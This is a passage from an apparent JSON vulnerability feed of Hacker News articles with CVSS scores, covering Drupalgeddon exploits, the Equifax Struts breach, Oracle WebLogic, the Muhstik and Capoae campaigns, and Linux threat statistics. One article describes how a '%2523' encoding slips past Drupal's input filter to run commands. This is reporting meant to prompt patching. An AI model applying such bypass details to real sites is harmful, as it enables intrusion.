attacks in the past have applied the patch as a way to guarantee that only that attacker is in control of the site.\"\n\nHere's a guide Drupal team suggest to follow [if your website has been hacked](<https://www.drupal.org/node/2365547>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-18T09:49:00", "type": "thn", "title": "Hackers Exploiting Drupal Vulnerability to Inject Cryptocurrency Miners", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271", "CVE-2018-7600"], "modified": "2018-04-18T09:50:03", "id": "THN:F03064A70C65D9BD62A8F5898BA276D2", "href": "https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:34", "description": "[](<https://thehackernews.com/images/-UXNjejbbqro/WuHDxyHAooI/AAAAAAAAwdM/yTGfiL9DknsnLaj9Z4dNy7xHoeZPrXinwCLcBGAs/s728-e100/drupal-hacking.png>)\n\nOnly a few hours after the Drupal team releases latest updates to fix a new remote code execution flaw in its content management system software, hackers have already started exploiting the vulnerability in the wild. \n \nAnnounced yesterday, the newly discovered vulnerability ([CVE-2018-7602](<https://thehackernews.com/2018/04/drupal-vulnerability-exploit.html>)) affects Drupal 7 and 8 core and allows remote attackers to achieve exactly same what previously discovered [Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) (CVE-2018-7600) flaw allowed\u2014complete take over of affected websites. \n \nAlthough Drupal team has not released any technical details of the vulnerability to prevent immediate exploitation, two individual hackers have revealed some details, along with a [proof-of-concept exploit](<https://pastebin.com/pRM8nmwj>) just a few hours after the patch release. \n \nIf you have been actively reading every latest story on The Hacker News, you must be aware of how the release of [Drupalgeddon2 PoC exploit](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) derived much attention, which eventually allowed attackers actively hijack websites and [spread cryptocurrency miners](<https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html>), backdoors, and other malware. \n \nAs expected, the Drupal team has warned that the new remote code execution flaw, let's refer it **Drupalgeddon3**, is now actively being exploited in the wild, again leaving millions of websites vulnerable to hackers. \n \nIn this article, I have briefed what this new flaw is all about and how attackers have been exploiting it to hack websites running unpatched versions of Drupal. \n\n\n[](<https://thehackernews.com/images/-aGyyaDhvYXI/WuHEwO_-DLI/AAAAAAAAwdU/brSU19-lJUkoC7LU-0YR1vh10h9gVLrLQCLcBGAs/s728-e100/drupal-exploit-code.png>)\n\n \nThe exploitation process of Drupalgeddon3 flaw is somewhat similar to Drupalgeddon2, except it requires a slightly different payload to trick vulnerable websites into executing the malicious payload on the victim's server. \n \nDrupalgeddon3 resides due to the improper input validation in Form API, also known as \"renderable arrays,\" which renders metadata to output the structure of most of the UI (user interface) elements in Drupal. These renderable arrays are a key-value structure in which the property keys start with a hash sign (#). \n \nA Twitter user with handle [@_dreadlocked](<https://twitter.com/_dreadlocked/status/989206562945273859>) explains that the flaw in Form API can be triggered through the \"destination\" GET parameter of a URL that loads when a registered user initiates a request to delete a node; where, a \"node\" is any piece of individual content, such as a page, article, forum topic, or a post. \n \nSince this \"destination\" GET query parameter also accepts another URL (as a value) with its own GET parameters, whose values were not sanitized, it allowed an authenticated attacker to trick websites into executing the code. \n \nWhat I have understood from the PoC exploit released by another Twitter user, using handle [@Blaklis_](<https://twitter.com/Blaklis_/status/989229547030794241?s=08>), is that the unsanitized values pass though stripDangerousValues() function that filters \"#\" character and can be abused by encoding the \"#\" character in the form of \"%2523\". \n \nThe function decodes \"%2523\" into \"%23,\" which is the Unicode version for \"#\" and will be processed to run arbitrary code on the system, such as a whoami utility. \n \nAt first, Drupal developers were skeptical about the possibility of real attacks using the Drupalgeddon3 vulnerability, but after the reports of in-the-wild attacks emerged, Drupal raised the level of danger of the problem to \"Highly critical.\" \n \nTherefore, all Drupal website administrators are highly recommended to update their websites to the latest versions of the software as soon as possible.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-26T12:32:00", "type": "thn", "title": "Release of PoC Exploit for New Drupal Flaw Once Again Puts Sites Under Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-04-26T12:32:45", "id": "THN:F8EDB5227B5DA0E4B49064C2972A193D", "href": "https://thehackernews.com/2018/04/drupalgeddon3-exploit-code.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-27T09:17:55", "description": "[](<https://3.bp.blogspot.com/-F7ViQ9JXvL8/Wbo_3TiAKWI/AAAAAAAAAJM/fsHVxS_O8ysIy4sZ2wdnG1OfLkiNJTjzgCLcBGAs/s1600/equifax-apache-struts.png>)\n\nThe [massive Equifax data breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>) that exposed highly sensitive data of as many as 143 million people was caused by [exploiting a flaw in Apache Struts](<https://thehackernews.com/2017/03/apache-struts-framework.html>) framework, which Apache patched over two months earlier of the security incident, Equifax has confirmed. \n \nCredit rating agency Equifax is yet another example of the companies that became victims of massive cyber attacks due to not patching a critical vulnerability on time, for which patches were already issued by the respected companies. \n \nRated critical with a maximum 10.0 score, the Apache Struts2 vulnerability (CVE-2017-5638) exploited in the Equifax breach was disclosed and fixed by Apache on March 6 with the release of Apache Struts version 2.3.32 or 2.5.10.1. \n \nThis flaw is separate from CVE-2017-9805, [another Apache Struts2 vulnerability](<https://thehackernews.com/2017/09/apache-struts-vulnerability.html>) that was patched earlier this month, which was a programming bug that manifests due to the way Struts REST plugin handles XML payloads while deserializing them, and was fixed in Struts version 2.5.13. \n \nRight after the disclosure of the vulnerability, hackers started actively exploiting the flaw in the wild to install rogue applications on affected web servers after its [proof-of-concept (PoC) exploit code](<https://thehackernews.com/2017/03/apache-struts-framework.html>) was uploaded to a Chinese site. \n \nDespite patches were made available and proofs that the flaw was already under mass attack by hackers, Equifax failed to patched its Web applications against the flaw, which resulted in the breach of personal data of [nearly half of the US population](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>). \n\n\n> \"Equifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cyber security firm to determine what information was accessed and who have been impacted,\" the company officials wrote in an [update on the website](<https://www.equifaxsecurity2017.com/>) with a new \"A Progress Update for Consumers.\" \n\n> \"We [know that](<https://www.equifaxsecurity2017.com/2017/09/13/progress-update-consumers-4/>) criminals exploited a US website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.\"\n\nCVE-2017-5638 was a then-zero-day vulnerability discovered in the [popular Apache Struts](<https://thehackernews.com/2017/09/apache-struts-flaws-cisco.html>) web application framework by Cisco's Threat intelligence firm Talos, which observed a number of active attacks exploiting the flaw. \n \nThe issue was a remote code execution bug in the Jakarta Multipart parser of Apache Struts2 that could allow an attacker to execute malicious commands on the server when uploading files based on the parser. \n \nAt the time, Apache warned it was possible to perform a remote code execution attack with \"a malicious Content-Type value,\" and if this value is not valid \"an exception is thrown which is then used to display an error message to a user.\" \n \n**Also Read: **[Steps You Should Follow to Protect Yourself From Equifax Breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>) \n \nFor those unaware, Apache Struts is a free, open-source MVC framework for developing web applications in the Java programming language that run both front-end and back-end Web servers. The framework is used by 65n per cent of the Fortune 100 companies, including Lockheed Martin, Vodafone, Virgin Atlantic, and the IRS. \n \nSince the hackers are actively exploiting the vulnerabilities in the Apache Struts web framework, Cisco has also [initiated an investigation](<https://thehackernews.com/2017/09/apache-struts-flaws-cisco.html>) into its products against four newly discovered security vulnerabilities in Apache Struts2. \n \nOther companies that also incorporate a version of Apache Struts 2 should also check their infrastructures against these vulnerabilities. \n \nEquifax is currently offering free credit-monitoring and identity theft protection services for people who are affected by the massive data leak and has also enabled a security freeze for access to people's information. \n \nWhile the company was initially criticised for generating a PIN that was simply a time and date stamp and easy-to-guess, the PIN generation method was later changed to randomly generate numbers.\n", "cvss3": {}, "published": "2017-09-13T21:38:00", "type": "thn", "title": "Equifax Suffered Data Breach After It Failed to Patch Old Apache Struts Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-15T10:00:54", "id": "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "href": "https://thehackernews.com/2017/09/equifax-apache-struts.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-05-09T12:39:33", "description": "[](<https://thehackernews.com/images/-QjntPm-XQwU/XQqCA-uhRxI/AAAAAAAA0O4/orMmbHnGcYkUqJsHHXoCHD5yfnj6ayEQwCLcBGAs/s728-e100/oracle-weblogic-vulnerability.jpg>)\n\nOracle has released an out-of-band emergency software update to patch a newly discovered critical vulnerability in the WebLogic Server. \n \nAccording to Oracle, the vulnerability\u2014which can be identified as **CVE-2019-2729** and has a CVSS score of 9.8 out of 10\u2014is already being exploited in the wild by an unnamed group of attackers. \n \n**Oracle WebLogic **is a Java-based multi-tier enterprise application server that allows businesses to quickly deploy new products and services on the cloud, which is popular across both, cloud environment and conventional environments. \n \nThe reported vulnerability is a deserialization issue via XMLDecoder in Oracle WebLogic Server Web Services that could allow unauthorized remote attackers to execute arbitrary code on the targeted servers and take control over them. \n \n\"This remote code execution vulnerability is remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password,\" the [advisory](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html>) said. \n \nIn a separate [note](<https://blogs.oracle.com/security/security-alert-cve-2019-2729-released>), the company also revealed that the flaw is related to a previously known deserialization vulnerability (**CVE-2019-2725**) in Oracle WebLogic Server that it patched in April this year. \n \nThe previously patched RCE flaw in Oracle WebLogic was also exploited by attackers as a zero-day i.e., to distribute [Sodinokibi ransomware](<https://thehackernews.com/2019/05/ransomware-oracle-weblogic.html>) and [cryptocurrency mining malware](<https://thehackernews.com/2019/04/oracle-weblogic-hacking.html>). \n \nReported independently by a separate group of individuals and organizations, the new vulnerability affects Oracle WebLogic Server versions 10.3.6.0.0, 12.1.3.0.0, and 12.2.1.3.0 \n \nDue to the severity of this vulnerability, the company has recommended affected users and companies to install available security updates as soon as possible. \n \n\n\n## Other Important Security Updates from Oracle\n\n \nBesides this, Cisco today also released several other software updates for various of its products that to addresses some critical and high severity vulnerabilities. \n \n \n\n\n * [Cisco TelePresence](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190619-tele-shell-inj>) \u2014 a video conferencing system by Cisco, the software contains a high severity vulnerability that could allow remote attackers to execute arbitrary shell commands or scripts on the targeted device just by sending crafted CDP packets to an affected device.\n * [Cisco SD-WAN Solution](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190619-sdwan-privesca>) \u2014 The vManage web-based interface of the software-defined WAN solutions by Cisco contains three flaws, two of which have been rated high in severity, and one is critical. Two of these allow an attacker to elevate his privileges to the root user, whereas one flaw could allow an authenticated, remote attacker to execute arbitrary commands with root privileges.\n * [Cisco Router Management Interface](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190619-rvrouters-dos>) \u2014 Cisco's RV110W, RV130W, and RV215W Routers contains a denial-of-service vulnerability that could allow an unauthenticated attacker to cause a reload of an affected device. Another flaw in this product affected by a medium severity issue that could expose the list of devices that are connected to the guest network to remote attackers.\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-19T18:42:00", "type": "thn", "title": "New Critical Oracle WebLogic Flaw Under Active Attack \u2014 Patch Now", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725", "CVE-2019-2729"], "modified": "2019-06-19T19:12:22", "id": "THN:515CD17353FD69BC2811599574546F0A", "href": "https://thehackernews.com/2019/06/oracle-weblogic-vulnerability.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:25", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh09KugWf9Nll7KSG7yZBNIvMLXvLKZ92heAygg8X6PYa2oq5Gp7OARqFBSZyMbfZCsrcK9Mh72AhpOgxuEXhmjAynK6iRSEf_xMMAl_T0oqulTMyMrJgAc7PDPFVO0MuKFWRJessc_Iu5-Rm-QSXVXRVTrU_666K232IVvIKEiChh39TVtKy5BnyQY/s728-e100/redis.jpg>)\n\nMuhstik, a botnet infamous for propagating via web application exploits, has been observed targeting Redis servers using a recently disclosed vulnerability in the database system.\n\nThe vulnerability relates to [CVE-2022-0543](<https://nvd.nist.gov/vuln/detail/CVE-2022-0543>), a [Lua sandbox escape flaw](<https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce>) in the open-source, in-memory, key-value data store that could be abused to achieve remote code execution on the underlying machine. The vulnerability is rated 10 out of 10 for severity.\n\n\"Due to a packaging issue, a remote attacker with the ability to execute arbitrary Lua scripts could possibly escape the Lua sandbox and execute arbitrary code on the host,\" Ubuntu noted in an advisory released last month.\n\nAccording to [telemetry data](<https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers>) gathered by Juniper Threat Labs, the attacks leveraging the new flaw are said to have commenced on March 11, 2022, leading to the retrieval of a malicious shell script (\"russia.sh\") from a remote server, which is then utilized to fetch and execute the botnet binaries from another server.\n\nFirst [documented](<https://blog.netlab.360.com/gpon-exploit-in-the-wild-i-muhstik-botnet-among-others-en/>) by Chinese security firm Netlab 360, Muhstik is known to be [active](<https://www.lacework.com/blog/meet-muhstik-iot-botnet-infecting-cloud-servers/>) since March 2018 and is monetized for carrying out coin mining activities and staging distributed denial-of-service (DDoS) attacks.\n\nCapable of self-propagating on Linux and IoT devices like GPON home router, DD-WRT router, and [Tomato routers](<https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/>), Muhstik has been spotted weaponizing a number of flaws over the years \u2013\n\n * [**CVE-2017-10271**](<https://nvd.nist.gov/vuln/detail/cve-2017-10271>) (CVSS score: 7.5) \u2013 An input validation vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) \u2013 Drupal remote code execution vulnerability\n * [**CVE-2019-2725**](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) (CVSS score: 9.8) \u2013 Oracle WebLogic Server remote code execution vulnerability\n * [**CVE-2021-26084**](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>) (CVSS score: 9.8) \u2013 An OGNL (Object-Graph Navigation Language) injection flaw in Atlassian Confluence, and\n * [**CVE-2021-44228**](<https://thehackernews.com/2021/12/apache-log4j-vulnerability-log4shell.html>) (CVSS score: 10.0) \u2013 Apache Log4j remote code execution vulnerability (aka Log4Shell)\n\n\"This bot connects to an IRC server to receive commands which include the following: download files, shell commands, flood attacks, [and] SSH brute force,\" Juniper Threat Labs researchers said in a report published last week.\n\nIn light of active exploitation of the critical security flaw, users are highly recommended to move quickly to patch their Redis services to the latest version.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-28T06:59:00", "type": "thn", "title": "Muhstik Botnet Targeting Redis Servers Using Recently Disclosed Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271", "CVE-2018-7600", "CVE-2019-2725", "CVE-2021-26084", "CVE-2021-44228", "CVE-2022-0543"], "modified": "2022-03-28T06:59:18", "id": "THN:4DE731C9D113C3993C96A773C079023F", "href": "https://thehackernews.com/2022/03/muhstik-botnet-targeting-redis-servers.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:17", "description": "[](<https://thehackernews.com/images/-0qCTVNBbagI/YUmu3sDCBAI/AAAAAAAAD1k/k2oakh_7XAY6Wn7t1L57tvpGWxcFEF7iACLcBGAsYHQ/s0/php-malware.gif>)\n\nA recently discovered wave of malware attacks has been spotted using a variety of tactics to enslave susceptible machines with easy-to-guess administrative credentials to co-opt them into a network with the goal of illegally mining cryptocurrency.\n\n\"The malware's primary tactic is to spread by taking advantage of vulnerable systems and weak administrative credentials. Once they've been infected, these systems are then used to mine cryptocurrency,\" Akamai security researcher Larry Cashdollar [said](<https://www.akamai.com/blog/security/capoae-malware-ramps-up-uses-multiple-vulnerabilities-and-tactics-to-spread>) in a write-up published last week.\n\nThe PHP malware \u2014 codenamed \"Capoae\" (short for \"\u0421\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435,\" the Russian word for \"Scanning\") \u2014 is said to be delivered to the hosts via a backdoored addition to a WordPress plugin called \"download-monitor,\" which gets installed after successfully brute-forcing WordPress admin credentials. The attacks also involve the deployment of a [Golang binary](<https://www.virustotal.com/gui/file/7d1e2685b0971497d75cbc4d4dac7dc104e83b20c2df8615cf5b008dd37caee0/detection>) with decryption functionality, with the obfuscated payloads retrieved by leveraging the trojanized plugin to make a GET request from an actor-controlled domain.\n\n[](<https://thehackernews.com/images/-wFLrozAbkbI/YUmtp8WYEJI/AAAAAAAAD1c/NGDuAVPUzDcFWdqor6HQHxg5W4I9mYwEQCLcBGAsYHQ/s0/shell.jpg>)\n\nAlso included is a feature to decrypted and execute additional payloads, while the Golang binary takes advantage of exploits for multiple remote code execution flaws in Oracle WebLogic Server ([CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>)), NoneCms ([CVE-2018-20062](<https://nvd.nist.gov/vuln/detail/CVE-2018-20062>)), and Jenkins ([CVE-2019-1003029](<https://nvd.nist.gov/vuln/detail/CVE-2019-1003029>) and [CVE-2019-1003030](<https://nvd.nist.gov/vuln/detail/CVE-2019-1003030>)) to brute force its way into systems running SSH and ultimately launch the XMRig mining software.\n\nWhat's more, the attack chain stands out for its persistence tricks, which includes choosing a legitimate-looking system path on the disk where system binaries are likely to be found as well as generating a random six-character filename that's then subsequently used to copy itself into the new location on the system before deleting the malware upon execution.\n\n\"The Capoae campaign's use of multiple vulnerabilities and tactics highlights just how intent these operators are on getting a foothold on as many machines as possible,\" Cashdollar said. \"The good news is, the same techniques we recommend for most organizations to keep systems and networks secure still apply here.\"\n\n\"Don't use weak or default credentials for servers or deployed applications,\" Cashdollar added. \"Ensure you're keeping those deployed applications up to date with the latest security patches and check in on them from time to time. Keeping an eye out for higher than normal system resource consumption, odd/unexpected running processes, suspicious artifacts and suspicious access log entries, etc., will help you potentially identify compromised machines.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-09-21T10:08:00", "type": "thn", "title": "New Capoae Malware Infiltrates WordPress Sites and Installs Backdoored Plugin", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-20062", "CVE-2019-1003029", "CVE-2019-1003030", "CVE-2020-14882"], "modified": "2021-09-21T10:08:05", "id": "THN:B36CB9AC96CE2C515157963E75E4AC6A", "href": "https://thehackernews.com/2021/09/new-capoae-malware-infiltrates.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:24", "description": "[](<https://thehackernews.com/images/-mNDlC0tKMKU/YSOiCQjKsfI/AAAAAAAADm0/8vxg1C4GweIrljnlPQrCj0yPLMYs18y_ACLcBGAsYHQ/s0/linux.jpg>)\n\nClose to 14 million Linux-based systems are directly exposed to the Internet, making them a lucrative target for an array of real-world attacks that could result in the deployment of malicious web shells, coin miners, ransomware, and other trojans.\n\nThat's according to an in-depth look at the Linux threat landscape published by U.S.-Japanese cybersecurity firm [Trend Micro](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/linux-threat-report-2021-1h-linux-threats-in-the-cloud-and-security-recommendations>), detailing the top threats and vulnerabilities affecting the operating system in the first half of 2021, based on data amassed from honeypots, sensors, and anonymized telemetry.\n\nThe company, which detected nearly 15 million malware events aimed at Linux-based cloud environments, found coin miners and ransomware to make up 54% of all malware, with web shells accounting for a 29% share.\n\nIn addition, by dissecting over 50 million events reported from 100,000 unique Linux hosts during the same time period, the researchers found 15 different security weaknesses that are known to be actively exploited in the wild or have a proof of concept (PoC) \u2014\n\n * [**CVE-2017-5638**](<https://nvd.nist.gov/vuln/detail/CVE-2017-5638>) (CVSS score: 10.0) - Apache Struts 2 remote code execution (RCE) vulnerability\n * [**CVE-2017-9805**](<https://nvd.nist.gov/vuln/detail/CVE-2017-9805>) (CVSS score: 8.1) - Apache Struts 2 REST plugin XStream RCE vulnerability\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) - Drupal Core RCE vulnerability\n * [**CVE-2020-14750**](<https://nvd.nist.gov/vuln/detail/CVE-2020-14750>) (CVSS score: 9.8) - Oracle WebLogic Server RCE vulnerability\n * [**CVE-2020-25213**](<https://nvd.nist.gov/vuln/detail/CVE-2020-25213>) (CVSS score: 10.0) - WordPress File Manager (wp-file-manager) plugin RCE vulnerability\n * [**CVE-2020-17496**](<https://nvd.nist.gov/vuln/detail/CVE-2020-17496>) (CVSS score: 9.8) - vBulletin 'subwidgetConfig' unauthenticated RCE vulnerability\n * [**CVE-2020-11651**](<https://nvd.nist.gov/vuln/detail/CVE-2020-11651>) (CVSS score: 9.8) - SaltStack Salt authorization weakness vulnerability\n * [**CVE-2017-12611**](<https://nvd.nist.gov/vuln/detail/CVE-2017-12611>) (CVSS score: 9.8) - Apache Struts OGNL expression RCE vulnerability\n * [**CVE-2017-7657**](<https://nvd.nist.gov/vuln/detail/CVE-2017-7657>) (CVSS score: 9.8) - Eclipse Jetty chunk length parsing integer overflow vulnerability\n * [**CVE-2021-29441**](<https://nvd.nist.gov/vuln/detail/CVE-2021-29441>) (CVSS score: 9.8) - Alibaba Nacos AuthFilter authentication bypass vulnerability\n * [**CVE-2020-14179**](<https://nvd.nist.gov/vuln/detail/CVE-2020-14179>) (CVSS score: 5.3) - Atlassian Jira information disclosure vulnerability \n * [**CVE-2013-4547**](<https://nvd.nist.gov/vuln/detail/CVE-2013-4547>) (CVSS score: 8.0) - Nginx crafted URI string handling access restriction bypass vulnerability\n * [**CVE-2019-0230**](<https://nvd.nist.gov/vuln/detail/CVE-2019-0230>) (CVSS score: 9.8) - Apache Struts 2 RCE vulnerability\n * [**CVE-2018-11776**](<https://nvd.nist.gov/vuln/detail/CVE-2018-11776>) (CVSS score: 8.1) - Apache Struts OGNL expression RCE vulnerability\n * [**CVE-2020-7961**](<https://nvd.nist.gov/vuln/detail/CVE-2020-7961>) (CVSS score: 9.8) - Liferay Portal untrusted deserialization vulnerability\n\n[](<https://thehackernews.com/images/-CcxYro041Ss/YSOhRgK85gI/AAAAAAAADmo/EddtTNpqRVsnxWJ2QLdym3CSkEJDwcSggCLcBGAsYHQ/s0/report-1.jpg>)\n\n[](<https://thehackernews.com/images/-p0iNN7yORLk/YSOhRABhMqI/AAAAAAAADmk/RQED6fXWrDkadRhDxqU0JzZOoWwJePPkQCLcBGAsYHQ/s0/report-.jpg>)\n\nEven more troublingly, the 15 most commonly used Docker images on the official Docker Hub repository has been revealed to harbor hundreds of vulnerabilities spanning across python, node, wordpress, golang, nginx, postgres, influxdb, httpd, mysql, debian, memcached, redis, mongo, centos, and rabbitmq, underscoring the need to [secure containers](<https://www.trendmicro.com/vinfo/us/security/news/security-technology/container-security-examining-potential-threats-to-the-container-environment>) from a wide range of potential threats at each stage of the development pipeline.\n\n\"Users and organizations should always apply security best practices, which include utilizing the security by design approach, deploying multilayered virtual patching or vulnerability shielding, employing the principle of least privilege, and adhering to the shared responsibility model,\" the researchers concluded.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": 